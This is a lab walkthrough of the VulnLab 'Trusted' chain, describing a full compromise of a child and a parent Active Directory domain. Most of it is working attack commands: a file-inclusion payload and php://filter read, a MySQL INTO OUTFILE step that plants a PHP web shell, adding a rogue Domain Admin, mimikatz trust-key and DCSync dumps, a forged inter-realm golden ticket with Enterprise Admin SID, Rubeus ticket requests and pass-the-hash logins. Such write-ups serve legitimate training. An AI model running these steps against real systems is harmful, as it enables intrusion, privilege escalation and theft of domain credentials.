TRUSTED – VULNLAB

This is the Write-up/Walkthrough of the TRUSTED Chain Machine from VULNLAB.

This machine is a Chain of two machines one Child domain and a Parent domain.

NMAP SCAN for PARENT Domain: 10.10.133.229

53/tcp   open  domain        syn-ack Simple DNS Plus
88/tcp   open  kerberos-sec  syn-ack Microsoft Windows Kerberos (server time: 2023-08-12 13:19:27Z)
135/tcp  open  msrpc         syn-ack Microsoft Windows RPC
139/tcp  open  netbios-ssn   syn-ack Microsoft Windows netbios-ssn
389/tcp  open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: trusted.vl0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds? syn-ack
464/tcp  open  kpasswd5?     syn-ack
593/tcp  open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped    syn-ack
3268/tcp open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: trusted.vl0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped    syn-ack
3389/tcp open  ms-wbt-server syn-ack Microsoft Terminal Services
| ssl-cert: Subject: commonName=trusteddc.trusted.vl
| Issuer: commonName=trusteddc.trusted.vl
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
SNIP
| rdp-ntlm-info: 
|   Target_Name: TRUSTED
|   NetBIOS_Domain_Name: TRUSTED
|   NetBIOS_Computer_Name: TRUSTEDDC
|   DNS_Domain_Name: trusted.vl
|   DNS_Computer_Name: trusteddc.trusted.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2023-08-12T13:19:39+00:00

Domain: trusted.vl, BIOS NAME: TRUSTEDDC

NMAP SCAN for CHILD Domain: 10.10.133.230

53/tcp   open  domain        syn-ack Simple DNS Plus
80/tcp   open  http          syn-ack Apache httpd 2.4.53 ((Win64) OpenSSL/1.1.1n PHP/8.1.6)
|_http-server-header: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6
| http-title: Welcome to XAMPP
|_Requested resource was http://10.10.151.102/dashboard/
|_http-favicon: Unknown favicon MD5: 56F7C04657931F2D0B79371B2D6E9820
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
88/tcp   open  kerberos-sec  syn-ack Microsoft Windows Kerberos (server time: 2023-08-12 13:11:47Z)
135/tcp  open  msrpc         syn-ack Microsoft Windows RPC
139/tcp  open  netbios-ssn   syn-ack Microsoft Windows netbios-ssn
389/tcp  open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: trusted.vl0., Site: Default-First-Site-Name)
443/tcp  open  ssl/http      syn-ack Apache httpd 2.4.53 ((Win64) OpenSSL/1.1.1n PHP/
445/tcp  open  microsoft-ds? syn-ack
464/tcp  open  kpasswd5?     syn-ack
593/tcp  open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped    syn-ack
3306/tcp open  mysql         syn-ack MySQL 5.5.5-10.4.24-MariaDB
| mysql-info: 
|   Protocol: 10
|   Version: 5.5.5-10.4.24-MariaDB
|   Thread ID: 12
|   Capabilities flags: 63486
|   Some Capabilities: FoundRows, SupportsCompression, LongColumnFlag, SupportsTransactions, Support41Auth, ODBCClient, IgnoreSpaceBeforeParenthesis, DontAllowDatabaseTableColumn, Speaks41ProtocolOld, SupportsLoadDataLocal, InteractiveClient, ConnectWithDatabase, Speaks41ProtocolNew, IgnoreSigpipes, SupportsMultipleStatments, SupportsMultipleResults, SupportsAuthPlugins
|   Status: Autocommit
|   Salt: ;^I3buG?E~l%mw.}NKnj
|_  Auth Plugin Name: mysql_native_password
3389/tcp open  ms-wbt-server syn-ack Microsoft Terminal Services
|_ssl-date: 2023-08-12T13:12:08+00:00; +2s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: LAB
|   NetBIOS_Domain_Name: LAB
|   NetBIOS_Computer_Name: LABDC
|   DNS_Domain_Name: lab.trusted.vl
|   DNS_Computer_Name: labdc.lab.trusted.vl
|   DNS_Tree_Name: trusted.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2023-08-12T13:12:00+00:00

Domain: lab.trusted.vl, BIOS NAME: LABDC

Found CHILD Domain name: LABDC.LAB.TRUSTED.VL and PARENT Domain: TRUSTEDDC.TRUSTED.VL

Running Gobuster on Child Domain: LABDC

/aux                  (Status: 403) [Size: 302]
/cgi-bin/             (Status: 403) [Size: 302]
/com1                 (Status: 403) [Size: 302]
/com4                 (Status: 403) [Size: 302]
/com3                 (Status: 403) [Size: 302]
/com2                 (Status: 403) [Size: 302]
/con                  (Status: 403) [Size: 302]
/dashboard            (Status: 301) [Size: 342] [--> http://10.10.133.230/dashboard/]
/dev                  (Status: 301) [Size: 336] [--> http://10.10.133.230/dev/]
/examples             (Status: 503) [Size: 402]
/favicon.ico          (Status: 200) [Size: 30894]
/img                  (Status: 301) [Size: 336] [--> http://10.10.133.230/img/]
/licenses             (Status: 403) [Size: 421]
/lpt1                 (Status: 403) [Size: 302]
/lpt2                 (Status: 403) [Size: 302]
/nul                  (Status: 403) [Size: 302]
/phpmyadmin           (Status: 403) [Size: 302]
/prn                  (Status: 403) [Size: 302]
/secci�               (Status: 403) [Size: 302]
/server-info          (Status: 403) [Size: 421]
/server-status        (Status: 403) [Size: 421]
/webalizer            (Status: 403) [Size: 302]
/xampp                (Status: 301) [Size: 338] [--> http://10.10.133.230/xampp/]

Going on /dev directory found a simple website, going on ABOUT page, saw it is including the file about.html to show the content of ABOUT page, tried file disclosure vulnerability and it works, as it is Windows machine, I tried seeing hosts file and it works and shows the content of hosts file:

Payload: http://10.10.187.166/dev/index.html/view=C:\Windows\System32\drivers\etc\hosts
gobuster dir -x php -w /usr/share/wordlist/dirb/big.txt -u http://10.10.187.166/dev/

Enumerating for more files on xampp directory, found db.php file using gobuster looking for php extensions, including db.php shows connected successfully, but it was not showing the content of db.php.

To show the content of db.php, I used php filter with the following path to get the content in base64 and decoded it.

http://10.10.187.166/dev/index.html?view=php://filter/convert.base64-encode/resource=C:\xampp\htdocs\dev\db.php

After decoding the base64, found the credentials for MySQL, as port 3306 is open, and logged in using this credentials.

mysql -u root -h 10.10.187.166 -p

Enumerating for databases and tables found some users and their md5 hashes, tried decrypting all the hashes, but only Robert’s hash got decrypted, and found the password “IHateEric2”.

After that used crackmapexec to authenticate using this credential for smb, but it did not respond, looking forward, I used mysql to add a new php file to /dev directory for executing system commands.

select 1,2,"<?php echo shell_exec($_GET['c']);?>",4 into OUTFILE 'C:/xampp/htdocs/dev/back.php'

Going on /dev/back.php?c=whoami, found that I have System privilege.

After that, i tried many ways to get the reverse shell but it didn’t work, so, I simply added a new user to the domain and added it to the “Administrators” group.

back.php?c=net user kunal hacker@123 /add /domain
back.php?c=net localgroup Administrators kunal /add /domain

After that used evil-winrm to connect to it, and add also user to “Domain Admins” group.

evil-winrm -u kunal -p hacker@123 -i 10.10.187.166
PS C:\Users\kunal\Documents> net group "Domain Admins" kunal /add /domain

Got Users.txt on the Administrator Desktop folder.

Looking forward, to enumerate Domain, I uploaded PowerView.ps1 using evil-winrm upload functionality and connected newly created user over RDP.

On RDP, open Powershell and imported the PowerView.ps1

. .\PowerView.ps1
OR

Import-Module .\PowerView.ps1

To pivot from Child to Parent Domain, I have to confirm that trust is bidirectional.

Enumerating for forest information, there are two forest trusted.vl which is parent, and lab.trusted.vl which is child.

Get-ForestDomain

Looking for forest trust to parent domain, Found that trust is Bidirectional.

Get-DomainTrust

As, I can see TrustDirection is Bidirectional, i can abuse this trust to get the Parent Domain, but before, I need some tool and information about the Domain.

To abuse the trust, I have to collect, SID of the Child Domain, SID of the Parent Domain and Trust key for inter-forest trust in rc4 cipher format.

Getting SID of Child and Parent Domain using PowerView module.

#for current domain, which is child domain
Get-DomainSID
#for parent domain which is trusted.vl, add -519 in last of parent SID to make it Enterprise Admin.
Get-DomainSID -Domain trusted.vl

Add -519 in root domain in last.

Retrieving inter-forest trust key as rc4 cipher, uploaded the mimikatz.exe using evil-winrm upload functionality and connected using rdp and opened cmd as administrator.

mimikatz # privilege::debug
mimikatz # lsadump::trust /patch

Copy the rc4 always from [ In ] only, and make sure to see the trust direction, I am pivoting from child to parent, so my trust direction is: [ IN] LAB.TRUSTED.VL → TRUSTED.VL

Download BetterSafetyKatz.exe from here.

After getting all the details, Using BetterSafetyKatz.exe as Administrator, to forge inter-forest TGT using the following command and saving the ticket into trust_tkt.kirbi file for later use for requesting TGS for specific services.

.\BetterSafetyKatz.exe "kerberos::golden /user:administrator /domain:lab.trusted.vl /sid:S-1-5-21-2241985869-2159962460-1278545866 /sids:S-1-5-21-3576695518-347000760-3731839591-519 /rc4:6bcc0ff781f2703112cd0f8f0af5763d /service:krbtgt /target:trusted.vl /ticket:C:\users\kunal\documents\trust_tkt.kirbi" "exit"

The ticket successfully got saved, using Rubues.exe as Administrator, for requesting for HTTP service using the saved ticket, for connecting to the root domain using winrm.

Rubeus.exe asktgs /ticket:trust_tkt.kirbi /service:http/trusteddc.trusted.vl /dc:trusteddc.trusted.vl /ptt

Checking the ticket using klist command.

klist

Using winrs to connect to trusteddc.trusted.vl

winrs -r:trusteddc.trusted.vl cmd

Tried, reading root.txt file but it was access denied.

After that, copied mimikatz.exe to trusteddc.trusted.vl and dump the hash of administrator.

#copying mimikatz.exe to trusteddc.trusted.vl
copy mimikatz.exe \\trusteddc.trusted.vl\c$
#dumping administrator hash
mimikatz # privilge::debug
mimikatz # lsadump::dcsync /user:trusted\administrator

After getting the hash of the administrator, used evil-winrm to pass the hash method to login in as Administrator, and read the root.txt.

evil-winrm -u administrator -H "ADMINISTRATOR-HASH-HERE" -i PARENT-DOMAIN-IP

If you face any problems, let me know in the comment.

Leave a Reply

Your email address will not be published. Required fields are marked *